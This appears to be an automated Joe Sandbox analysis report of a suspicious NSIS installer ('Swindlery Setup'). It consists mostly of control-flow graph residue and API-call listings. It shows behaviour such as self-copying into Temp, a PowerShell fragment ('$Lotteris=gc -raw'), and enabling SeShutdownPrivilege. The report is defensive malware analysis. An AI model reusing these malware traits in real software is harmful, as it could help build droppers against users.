405901 2937->2938 2939 405905 GetLastError 2937->2939 2938->2910 2939->2938 2942 40632d 2940->2942 2941 40656e 2943 402c8b 2941->2943 2979 40628d lstrcpynA 2941->2979 2942->2941 2945 406545 lstrlenA 2942->2945 2948 406320 15 API calls 2942->2948 2950 40644c GetSystemDirectoryA 2942->2950 2951 406462 GetWindowsDirectoryA 2942->2951 2952 406587 5 API calls 2942->2952 2953 406320 15 API calls 2942->2953 2954 4064ee lstrcatA 2942->2954 2956 4064c5 SHGetPathFromIDListA CoTaskMemFree 2942->2956 2966 406174 2942->2966 2971 4066b5 GetModuleHandleA 2942->2971 2977 4061eb wsprintfA 2942->2977 2978 40628d lstrcpynA 2942->2978 2943->2915 2957 406587 2943->2957 2945->2942 2948->2945 2950->2942 2951->2942 2952->2942 2953->2942 2954->2942 2956->2942 2963 406593 2957->2963 2958 4065fb 2959 4065ff CharPrevA 2958->2959 2961 40661a 2958->2961 2959->2958 2960 4065f0 CharNextA 2960->2958 2960->2963 2961->2915 2962 405c4a CharNextA 2962->2963 2963->2958 2963->2960 2963->2962 2964 4065de CharNextA 2963->2964 2965 4065eb CharNextA 2963->2965 2964->2963 2965->2960 2980 406113 2966->2980 2969 4061a8 RegQueryValueExA RegCloseKey 2970 4061d7 2969->2970 2970->2942 2972 4066d1 2971->2972 2973 4066db GetProcAddress 2971->2973 2984 406647 GetSystemDirectoryA 2972->2984 2976 4066ea 2973->2976 2975 4066d7 2975->2973 2975->2976 2976->2942 2977->2942 2978->2942 2979->2943 2981 406122 2980->2981 2982 406126 2981->2982 2983 40612b RegOpenKeyExA 2981->2983 2982->2969 2982->2970 2983->2982 2985 406669 wsprintfA LoadLibraryExA 2984->2985 2985->2975 2988 4053ec 2987->2988 2997 401431 2987->2997 2989 405409 lstrlenA 2988->2989 2990 406320 21 API calls 2988->2990 2991 405432 2989->2991 2992 405417 lstrlenA 2989->2992 2990->2989 2993 405445 2991->2993 2994 405438 SetWindowTextA 2991->2994 2995 405429 lstrcatA 2992->2995 2992->2997 2996 40544b SendMessageA SendMessageA SendMessageA 2993->2996 2993->2997 2994->2993 2995->2991 2996->2997 2997->2936 3901 4016e0 3902 402c5e 21 API calls 3901->3902 3903 4016e6 
GetFullPathNameA 3902->3903 3904 40171e 3903->3904 3905 4016fd 3903->3905 3906 401732 GetShortPathNameA 3904->3906 3907 402aea 3904->3907 3905->3904 3908 406620 2 API calls 3905->3908 3906->3907 3909 40170e 3908->3909 3909->3904 3911 40628d lstrcpynA 3909->3911 3911->3904 3912 404463 lstrcpynA lstrlenA 3117 405969 ShellExecuteExA 3136 401eea 3137 402c3c 21 API calls 3136->3137 3138 401ef0 3137->3138 3139 402c3c 21 API calls 3138->3139 3140 401efc 3139->3140 3141 401f13 EnableWindow 3140->3141 3142 401f08 ShowWindow 3140->3142 3143 402aea 3141->3143 3142->3143 3144 40176b 3145 402c5e 21 API calls 3144->3145 3146 401772 3145->3146 3150 405e4f 3146->3150 3148 401779 3149 405e4f 2 API calls 3148->3149 3149->3148 3151 405e5a GetTickCount GetTempFileNameA 3150->3151 3152 405e8b 3151->3152 3153 405e87 3151->3153 3152->3148 3153->3151 3153->3152 3913 40196c 3914 402c5e 21 API calls 3913->3914 3915 401973 lstrlenA 3914->3915 3916 40264d 3915->3916 3917 401ff0 3918 402c5e 21 API calls 3917->3918 3919 401ff7 3918->3919 3920 406620 2 API calls 3919->3920 3921 401ffd 3920->3921 3923 40200f 3921->3923 3924 4061eb wsprintfA 3921->3924 3924->3923 3925 4014f4 SetForegroundWindow 3926 402aea 3925->3926 3927 404778 3928 404788 3927->3928 3929 4047ae 3927->3929 3931 40432d 22 API calls 3928->3931 3930 404394 8 API calls 3929->3930 3933 4047ba 3930->3933 3932 404795 SetDlgItemTextA 3931->3932 3932->3929 3729 40177e 3730 402c5e 21 API calls 3729->3730 3731 401785 3730->3731 3732 4017a3 3731->3732 3733 4017ab 3731->3733 3768 40628d lstrcpynA 3732->3768 3769 40628d lstrcpynA 3733->3769 3736 4017b6 3738 405c1f 3 API calls 3736->3738 3737 4017a9 3740 406587 5 API calls 3737->3740 3739 4017bc lstrcatA 3738->3739 3739->3737 3762 4017c8 3740->3762 3741 406620 2 API calls 3741->3762 3743 405dfb 2 API calls 3743->3762 3744 4017df CompareFileTime 3744->3762 3745 4018a3 3747 4053d1 28 API calls 3745->3747 3746 40187a 3748 4053d1 28 API calls 3746->3748 3756 40188f 3746->3756 3749 4018ad 3747->3749 
3748->3756 3750 403168 35 API calls 3749->3750 3752 4018c0 3750->3752 3751 40628d lstrcpynA 3751->3762 3753 4018d4 SetFileTime 3752->3753 3755 4018e6 CloseHandle 3752->3755 3753->3755 3754 406320 21 API calls 3754->3762 3755->3756 3757 4018f7 3755->3757 3758 4018fc 3757->3758 3759 40190f 3757->3759 3760 406320 21 API calls 3758->3760 3761 406320 21 API calls 3759->3761 3763 401904 lstrcatA 3760->3763 3764 401917 3761->3764 3762->3741 3762->3743 3762->3744 3762->3745 3762->3746 3762->3751 3762->3754 3765 4059a3 MessageBoxIndirectA 3762->3765 3767 405e20 GetFileAttributesA CreateFileA 3762->3767 3763->3764 3766 4059a3 MessageBoxIndirectA 3764->3766 3765->3762 3766->3756 3767->3762 3768->3737 3769->3736 3934 40167e 3935 402c5e 21 API calls 3934->3935 3936 401684 3935->3936 3937 406620 2 API calls 3936->3937 3938 40168a 3937->3938 3939 40197e 3940 402c3c 21 API calls 3939->3940 3941 401985 3940->3941 3942 402c3c 21 API calls 3941->3942 3943 401992 3942->3943 3944 402c5e 21 API calls 3943->3944 3945 4019a9 lstrlenA 3944->3945 3946 4019b9 3945->3946 3947 4019f9 3946->3947 3951 40628d lstrcpynA 3946->3951 3949 4019e9 3949->3947 3950 4019ee lstrlenA 3949->3950 3950->3947 3951->3949 3952 401000 3953 401037 BeginPaint GetClientRect 3952->3953 3954 40100c DefWindowProcA 3952->3954 3956 4010f3 3953->3956 3957 401179 3954->3957 3958 401073 CreateBrushIndirect FillRect DeleteObject 3956->3958 3959 4010fc 3956->3959 3958->3956 3960 401102 CreateFontIndirectA 3959->3960 3961 401167 EndPaint 3959->3961 3960->3961 3962 401112 6 API calls 3960->3962 3961->3957 3962->3961 3963 401502 3964 401507 3963->3964 3966 40152d 3963->3966 3965 402c3c 21 API calls 3964->3965 3965->3966 3967 404805 GetDlgItem 3968 40481c 3967->3968 3969 404830 SetWindowTextA 3968->3969 3970 405cb8 4 API calls 3968->3970 3971 40432d 22 API calls 3969->3971 3972 404826 3970->3972 3973 40484c 3971->3973 3972->3969 3975 405c1f 3 API calls 3972->3975 3974 40432d 22 API calls 3973->3974 3976 40485a 3974->3976 
3975->3969 4022 404362 SendMessageA 3976->4022 3978 404860 3979 4066b5 5 API calls 3978->3979 3983 404867 3979->3983 3980 404af5 3981 404394 8 API calls 3980->3981 3982 404b09 3981->3982 3983->3980 3984 40494b 3983->3984 3986 406320 21 API calls 3983->3986 3984->3980 4023 405987 GetDlgItemTextA 3984->4023 3988 4048db SHBrowseForFolderA 3986->3988 3987 40497b 3989 405d0d 18 API calls 3987->3989 3988->3984 3990 4048f3 CoTaskMemFree 3988->3990 3991 404981 3989->3991 3992 405c1f 3 API calls 3990->3992 4024 40628d lstrcpynA 3991->4024 3993 404900 3992->3993 3995 404937 SetDlgItemTextA 3993->3995 3998 406320 21 API calls 3993->3998 3995->3984 3996 404998 3997 4066b5 5 API calls 3996->3997 4004 40499f 3997->4004 3999 40491f lstrcmpiA 3998->3999 3999->3995 4002 404930 lstrcatA 3999->4002 4000 4049db 4025 40628d lstrcpynA 4000->4025 4002->3995 4003 4049e2 4005 405cb8 4 API calls 4003->4005 4004->4000 4008 405c66 2 API calls 4004->4008 4010 404a33 4004->4010 4006 4049e8 GetDiskFreeSpaceA 4005->4006 4009 404a0c MulDiv 4006->4009 4006->4010 4008->4004 4009->4010 4011 404aa4 4010->4011 4026 404c3b 4010->4026 4012 404ac7 4011->4012 4014 40140b 2 API calls 4011->4014 4037 40434f KiUserCallbackDispatcher 4012->4037 4014->4012 4017 404aa6 SetDlgItemTextA 4017->4011 4018 404a96 4029 404b76 4018->4029 4019 404ae3 4019->3980 4038 404718 4019->4038 4022->3978 4023->3987 4024->3996 4025->4003 4027 404b76 24 API calls 4026->4027 4028 404a91 4027->4028 4028->4017 4028->4018 4030 404b8c 4029->4030 4031 406320 21 API calls 4030->4031 4032 404bf0 4031->4032 4033 406320 21 API calls 4032->4033 4034 404bfb 4033->4034 4035 406320 21 API calls 4034->4035 4036 404c11 lstrlenA wsprintfA SetDlgItemTextA 4035->4036 4036->4011 4037->4019 4039 404726 4038->4039 4040 40472b SendMessageA 4038->4040 4039->4040 4040->3980 4041 401a85 4042 402c3c 21 API calls 4041->4042 4043 401a8c 4042->4043 4044 402c3c 21 API calls 4043->4044 4045 401a33 4044->4045 4046 401588 4047 402a67 4046->4047 4050 4061eb wsprintfA 
4047->4050 4049 402a6c 4050->4049 4051 401b88 4052 402c5e 21 API calls 4051->4052 4053 401b8f 4052->4053 4054 402c3c 21 API calls 4053->4054 4055 401b98 wsprintfA 4054->4055 4056 402aea 4055->4056 4057 401d8a 4058 401d90 4057->4058 4059 401d9d GetDlgItem 4057->4059 4060 402c3c 21 API calls 4058->4060 4061 401d97 4059->4061 4060->4061 4062 401dde GetClientRect LoadImageA SendMessageA 4061->4062 4063 402c5e 21 API calls 4061->4063 4065 401e3f 4062->4065 4067 401e4b 4062->4067 4063->4062 4066 401e44 DeleteObject 4065->4066 4065->4067 4066->4067 4068 40278b 4069 402791 4068->4069 4070 402799 FindClose 4069->4070 4071 402aea 4069->4071 4070->4071 3154 40240d 3155 402c5e 21 API calls 3154->3155 3156 40241e 3155->3156 3157 402c5e 21 API calls 3156->3157 3158 402427 3157->3158 3159 402c5e 21 API calls 3158->3159 3160 402431 GetPrivateProfileStringA 3159->3160 4072 40280d 4073 402c5e 21 API calls 4072->4073 4074 402819 4073->4074 4075 40282f 4074->4075 4076 402c5e 21 API calls 4074->4076 4077 405dfb 2 API calls 4075->4077 4076->4075 4078 402835 4077->4078 4100 405e20 GetFileAttributesA CreateFileA 4078->4100 4080 402842 4081 4028fe 4080->4081 4084 4028e6 4080->4084 4085 40285d GlobalAlloc 4080->4085 4082 402905 DeleteFileA 4081->4082 4083 402918 4081->4083 4082->4083 4087 403168 35 API calls 4084->4087 4085->4084 4086 402876 4085->4086 4101 403390 SetFilePointer 4086->4101 4089 4028f3 CloseHandle 4087->4089 4089->4081 4090 40287c 4091 40337a ReadFile 4090->4091 4092 402885 GlobalAlloc 4091->4092 4093 402895 4092->4093 4094 4028cf 4092->4094 4095 403168 35 API calls 4093->4095 4096 405ec7 WriteFile 4094->4096 4099 4028a2 4095->4099 4097 4028db GlobalFree 4096->4097 4097->4084 4098 4028c6 GlobalFree 4098->4094 4099->4098 4100->4080 4101->4090 3161 40550f 3162 405531 GetDlgItem GetDlgItem GetDlgItem 3161->3162 3163 4056ba 3161->3163 3206 404362 SendMessageA 3162->3206 3165 4056c2 GetDlgItem CreateThread CloseHandle 3163->3165 3166 4056ea 3163->3166 3165->3166 3229 4054a3 
OleInitialize 3165->3229 3168 405718 3166->3168 3169 405700 ShowWindow ShowWindow 3166->3169 3170 405739 3166->3170 3167 4055a1 3172 4055a8 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3167->3172 3171 405773 3168->3171 3174 405728 3168->3174 3175 40574c ShowWindow 3168->3175 3211 404362 SendMessageA 3169->3211 3215 404394 3170->3215 3171->3170 3181 405780 SendMessageA 3171->3181 3179 405616 3172->3179 3180 4055fa SendMessageA SendMessageA 3172->3180 3212 404306 3174->3212 3177 40576c 3175->3177 3178 40575e 3175->3178 3185 404306 SendMessageA 3177->3185 3184 4053d1 28 API calls 3178->3184 3186 405629 3179->3186 3187 40561b SendMessageA 3179->3187 3180->3179 3183 405745 3181->3183 3188 405799 CreatePopupMenu 3181->3188 3184->3177 3185->3171 3207 40432d 3186->3207 3187->3186 3189 406320 21 API calls 3188->3189 3191 4057a9 AppendMenuA 3189->3191 3193 4057c7 GetWindowRect 3191->3193 3194 4057da TrackPopupMenu 3191->3194 3192 405639 3195 405642 ShowWindow 3192->3195 3196 405676 GetDlgItem SendMessageA 3192->3196 3193->3194 3194->3183 3198 4057f6 3194->3198 3199 405665 3195->3199 3200 405658 ShowWindow 3195->3200 3196->3183 3197 40569d SendMessageA SendMessageA 3196->3197 3197->3183 3201 405815 SendMessageA 3198->3201 3210 404362 SendMessageA 3199->3210 3200->3199 3201->3201 3202 405832 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3201->3202 3204 405854 SendMessageA 3202->3204 3204->3204 3205 405876 GlobalUnlock SetClipboardData CloseClipboard 3204->3205 3205->3183 3206->3167 3208 406320 21 API calls 3207->3208 3209 404338 SetDlgItemTextA 3208->3209 3209->3192 3210->3196 3211->3168 3213 404313 SendMessageA 3212->3213 3214 40430d 3212->3214 3213->3170 3214->3213 3216 404457 3215->3216 3217 4043ac GetWindowLongA 3215->3217 3216->3183 3217->3216 3218 4043c1 3217->3218 3218->3216 3219 4043f1 3218->3219 3220 4043ee GetSysColor 3218->3220 3221 404401 SetBkMode 3219->3221 3222 4043f7 SetTextColor 3219->3222 3220->3219 3223 404419 GetSysColor 3221->3223 3224 
40441f 3221->3224 3222->3221 3223->3224 3225 404430 3224->3225 3226 404426 SetBkColor 3224->3226 3225->3216 3227 404443 DeleteObject 3225->3227 3228 40444a CreateBrushIndirect 3225->3228 3226->3225 3227->3228 3228->3216 3236 404379 3229->3236 3231 4054c6 3235 4054ed 3231->3235 3239 401389 3231->3239 3232 404379 SendMessageA 3233 4054ff OleUninitialize 3232->3233 3235->3232 3237 404391 3236->3237 3238 404382 SendMessageA 3236->3238 3237->3231 3238->3237 3241 401390 3239->3241 3240 4013fe 3240->3231 3241->3240 3242 4013cb MulDiv SendMessageA 3241->3242 3242->3241 3243 40168f 3244 402c5e 21 API calls 3243->3244 3245 401696 3244->3245 3246 402c5e 21 API calls 3245->3246 3247 40169f 3246->3247 3248 402c5e 21 API calls 3247->3248 3249 4016a8 MoveFileA 3248->3249 3250 4016b4 3249->3250 3251 4016bb 3249->3251 3253 401423 28 API calls 3250->3253 3255 40230f 3251->3255 3257 406620 FindFirstFileA 3251->3257 3253->3255 3258 4016ca 3257->3258 3259 406636 FindClose 3257->3259 3258->3255 3260 406066 MoveFileExA 3258->3260 3259->3258 3261 406087 3260->3261 3262 40607a 3260->3262 3261->3250 3264 405ef6 3262->3264 3265 405f42 GetShortPathNameA 3264->3265 3266 405f1c 3264->3266 3268 406061 3265->3268 3269 405f57 3265->3269 3291 405e20 GetFileAttributesA CreateFileA 3266->3291 3268->3261 3269->3268 3271 405f5f wsprintfA 3269->3271 3270 405f26 CloseHandle GetShortPathNameA 3270->3268 3272 405f3a 3270->3272 3273 406320 21 API calls 3271->3273 3272->3265 3272->3268 3274 405f87 3273->3274 3292 405e20 GetFileAttributesA CreateFileA 3274->3292 3276 405f94 3276->3268 3277 405fa3 GetFileSize GlobalAlloc 3276->3277 3278 405fc5 3277->3278 3279 40605a CloseHandle 3277->3279 3280 405e98 ReadFile 3278->3280 3279->3268 3281 405fcd 3280->3281 3281->3279 3293 405d85 lstrlenA 3281->3293 3284 405fe4 lstrcpyA 3287 406006 3284->3287 3285 405ff8 3286 405d85 4 API calls 3285->3286 3286->3287 3288 40603d SetFilePointer 3287->3288 3289 405ec7 WriteFile 3288->3289 3290 406053 GlobalFree 3289->3290 3290->3279 
3291->3270 3292->3276 3294 405dc6 lstrlenA 3293->3294 3295 405dce 3294->3295 3296 405d9f lstrcmpiA 3294->3296 3295->3284 3295->3285 3296->3295 3297 405dbd CharNextA 3296->3297 3297->3294 4102 404b10 4103 404b20 4102->4103 4104 404b3c 4102->4104 4113 405987 GetDlgItemTextA 4103->4113 4106 404b42 SHGetPathFromIDListA 4104->4106 4107 404b6f 4104->4107 4109 404b59 SendMessageA 4106->4109 4110 404b52 4106->4110 4108 404b2d SendMessageA 4108->4104 4109->4107 4111 40140b 2 API calls 4110->4111 4111->4109 4113->4108 4114 401490 4115 4053d1 28 API calls 4114->4115 4116 401497 4115->4116 4117 401a12 4118 402c5e 21 API calls 4117->4118 4119 401a19 4118->4119 4120 402c5e 21 API calls 4119->4120 4121 401a22 4120->4121 4122 401a29 lstrcmpiA 4121->4122 4123 401a3b lstrcmpA 4121->4123 4124 401a2f 4122->4124 4123->4124 3402 401594 3403 4015a4 ShowWindow 3402->3403 3404 4015ab 3402->3404 3403->3404 3405 4015b9 ShowWindow 3404->3405 3406 402aea 3404->3406 3405->3406 4125 402318 4126 402c5e 21 API calls 4125->4126 4127 40231e 4126->4127 4128 402c5e 21 API calls 4127->4128 4129 402327 4128->4129 4130 402c5e 21 API calls 4129->4130 4131 402330 4130->4131 4132 406620 2 API calls 4131->4132 4133 402339 4132->4133 4134 40234a lstrlenA lstrlenA 4133->4134 4135 40233d 4133->4135 4136 4053d1 28 API calls 4134->4136 4137 4053d1 28 API calls 4135->4137 4139 402345 4135->4139 4138 402386 SHFileOperationA 4136->4138 4137->4139 4138->4135 4138->4139 4140 404498 4142 4045ba 4140->4142 4143 4044ae 4140->4143 4141 404629 4144 4046f3 4141->4144 4146 404633 GetDlgItem 4141->4146 4142->4141 4142->4144 4150 4045fe GetDlgItem SendMessageA 4142->4150 4145 40432d 22 API calls 4143->4145 4152 404394 8 API calls 4144->4152 4147 404504 4145->4147 4148 4046b1 4146->4148 4149 404649 4146->4149 4151 40432d 22 API calls 4147->4151 4148->4144 4153 4046c3 4148->4153 4149->4148 4157 40466f SendMessageA LoadCursorA SetCursor 4149->4157 4173 40434f KiUserCallbackDispatcher 4150->4173 4155 404511 CheckDlgButton 
4151->4155 4156 4046ee 4152->4156 4159 4046c9 SendMessageA 4153->4159 4160 4046da 4153->4160 4171 40434f KiUserCallbackDispatcher 4155->4171 4174 40473c 4157->4174 4159->4160 4160->4156 4164 4046e0 SendMessageA 4160->4164 4161 404624 4165 404718 SendMessageA 4161->4165 4164->4156 4165->4141 4166 40452f GetDlgItem 4172 404362 SendMessageA 4166->4172 4168 404545 SendMessageA 4169 404563 GetSysColor 4168->4169 4170 40456c SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4168->4170 4169->4170 4170->4156 4171->4166 4172->4168 4173->4161 4177 405969 ShellExecuteExA 4174->4177 4176 4046a2 LoadCursorA SetCursor 4176->4148 4177->4176 4178 402198 4179 402c5e 21 API calls 4178->4179 4180 40219f 4179->4180 4181 402c5e 21 API calls 4180->4181 4182 4021a9 4181->4182 4183 402c5e 21 API calls 4182->4183 4184 4021b3 4183->4184 4185 402c5e 21 API calls 4184->4185 4186 4021c0 4185->4186 4187 402c5e 21 API calls 4186->4187 4188 4021ca 4187->4188 4189 40220c CoCreateInstance 4188->4189 4190 402c5e 21 API calls 4188->4190 4191 40222b 4189->4191 4195 4022d9 4189->4195 4190->4189 4194 4022b9 MultiByteToWideChar 4191->4194 4191->4195 4192 401423 28 API calls 4193 40230f 4192->4193 4194->4195 4195->4192 4195->4193 4196 40239a 4197 4023a1 4196->4197 4200 4023b4 4196->4200 4198 406320 21 API calls 4197->4198 4199 4023ae 4198->4199 4201 4059a3 MessageBoxIndirectA 4199->4201 4201->4200 4202 40269a 4203 402c3c 21 API calls 4202->4203 4206 4026a4 4203->4206 4204 402712 4205 405e98 ReadFile 4205->4206 4206->4204 4206->4205 4207 402714 4206->4207 4208 402724 4206->4208 4211 4061eb wsprintfA 4207->4211 4208->4204 4210 40273a SetFilePointer 4208->4210 4210->4204 4211->4204 4212 402a1b 4213 402a22 4212->4213 4214 402a6e 4212->4214 4217 402c3c 21 API calls 4213->4217 4220 402a6c 4213->4220 4215 4066b5 5 API calls 4214->4215 4216 402a75 4215->4216 4218 402c5e 21 API calls 4216->4218 4219 402a30 4217->4219 4221 402a7e 4218->4221 4222 402c3c 21 API calls 4219->4222 4221->4220 4230 4062e0 
                          (Rendered control-flow graph residue from the preceding function graph: node addresses and edge list omitted)

                          Control-flow Graph
                          (Rendered graph for the function starting at 4033d8, with executed and not-executed nodes; edge list omitted, API calls are listed below)
                          APIs
                          • SetErrorMode.KERNELBASE(00008001), ref: 004033FB
                          • GetVersionExA.KERNEL32(?), ref: 00403424
                          • GetVersionExA.KERNEL32(0000009C), ref: 0040343B
                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403504
                          • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403541
                          • OleInitialize.OLE32(00000000), ref: 00403548
                          • SHGetFileInfoA.SHELL32(00429448,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 00403566
                          • GetCommandLineA.KERNEL32(Swindlery Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040357B
                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",00000020,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",00000000,?,00000008,0000000A,0000000C), ref: 004035B5
                          • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000008,0000000A,0000000C), ref: 004036AE
                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 004036BF
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036CB
                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036DF
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036E7
                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036F8
                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 00403700
                          • DeleteFileA.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 00403714
                          • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C), ref: 004037BA
                          • CoUninitialize.COMBASE(?,?,00000008,0000000A,0000000C), ref: 004037BF
                          • ExitProcess.KERNEL32 ref: 004037E0
                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",00000000,?,?,00000008,0000000A,0000000C), ref: 004037EF
                          • wsprintfA.USER32 ref: 00403846
                          • GetFileAttributesA.KERNEL32( for va",C:\Users\user\AppData\Local\Temp\, for va",?,0000000C), ref: 00403878
                          • DeleteFileA.KERNEL32( for va"), ref: 00403884
                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\, for va",?,0000000C), ref: 004038B0
                          • CopyFileA.KERNEL32(C:\Users\user\Desktop\vfhlZ0vrbe.exe, for va",00000001), ref: 004038C6
                          • CloseHandle.KERNEL32(00000000,"$Lotteris=gc -raw ',"$Lotteris=gc -raw ',?, for va",00000000), ref: 00403919
                          • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403936
                          • OpenProcessToken.ADVAPI32(00000000), ref: 0040393D
                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403995
                          • ExitProcess.KERNEL32 ref: 004039B6
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: FileProcess$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                          • String ID: for va"$"$"$Lotteris=gc -raw '$"C:\Users\user\Desktop\vfhlZ0vrbe.exe"$1033$A$Bry gek$$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth$C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene$C:\Users\user\Desktop$C:\Users\user\Desktop\vfhlZ0vrbe.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$Swindlery Setup$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                          • API String ID: 3308099279-713549643
                          • Opcode ID: 421d5eb472970c8e9273ab7cabbfa33fc046e403f42b0bf6beeb9477a4c27e51
                          • Instruction ID: 7f7404e7af7d96985e5cf9c88e74da5f08b6bc5144b1890d42f960bb7a69135c
                          • Opcode Fuzzy Hash: 421d5eb472970c8e9273ab7cabbfa33fc046e403f42b0bf6beeb9477a4c27e51
                          • Instruction Fuzzy Hash: E2F11570904254AADB21AF758D49BAF7EB8AF45706F0440BFF441B62D2CB7C4A45CB2E

                          Control-flow Graph
                          (Rendered graph for the function starting at 40550f, with executed and not-executed nodes; edge list omitted, API calls are listed below)
                          APIs
                          • GetDlgItem.USER32(?,00000403), ref: 0040556E
                          • GetDlgItem.USER32(?,000003EE), ref: 0040557D
                          • GetClientRect.USER32(?,?), ref: 004055BA
                          • GetSystemMetrics.USER32(00000002), ref: 004055C1
                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055E2
                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055F3
                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405606
                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405614
                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405627
                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405649
                          • ShowWindow.USER32(?,00000008), ref: 0040565D
                          • GetDlgItem.USER32(?,000003EC), ref: 0040567E
                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040568E
                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004056A7
                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004056B3
                          • GetDlgItem.USER32(?,000003F8), ref: 0040558C
                            • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                          • GetDlgItem.USER32(?,000003EC), ref: 004056CF
                          • CreateThread.KERNELBASE(00000000,00000000,Function_000054A3,00000000), ref: 004056DD
                          • CloseHandle.KERNELBASE(00000000), ref: 004056E4
                          • ShowWindow.USER32(00000000), ref: 00405707
                          • ShowWindow.USER32(?,00000008), ref: 0040570E
                          • ShowWindow.USER32(00000008), ref: 00405754
                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405788
                          • CreatePopupMenu.USER32 ref: 00405799
                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004057AE
                          • GetWindowRect.USER32(?,000000FF), ref: 004057CE
                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057E7
                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405823
                          • OpenClipboard.USER32(00000000), ref: 00405833
                          • EmptyClipboard.USER32 ref: 00405839
                          • GlobalAlloc.KERNEL32(00000042,?), ref: 00405842
                          • GlobalLock.KERNEL32(00000000), ref: 0040584C
                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405860
                          • GlobalUnlock.KERNEL32(00000000), ref: 00405879
                          • SetClipboardData.USER32(00000001,00000000), ref: 00405884
                          • CloseClipboard.USER32 ref: 0040588A
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
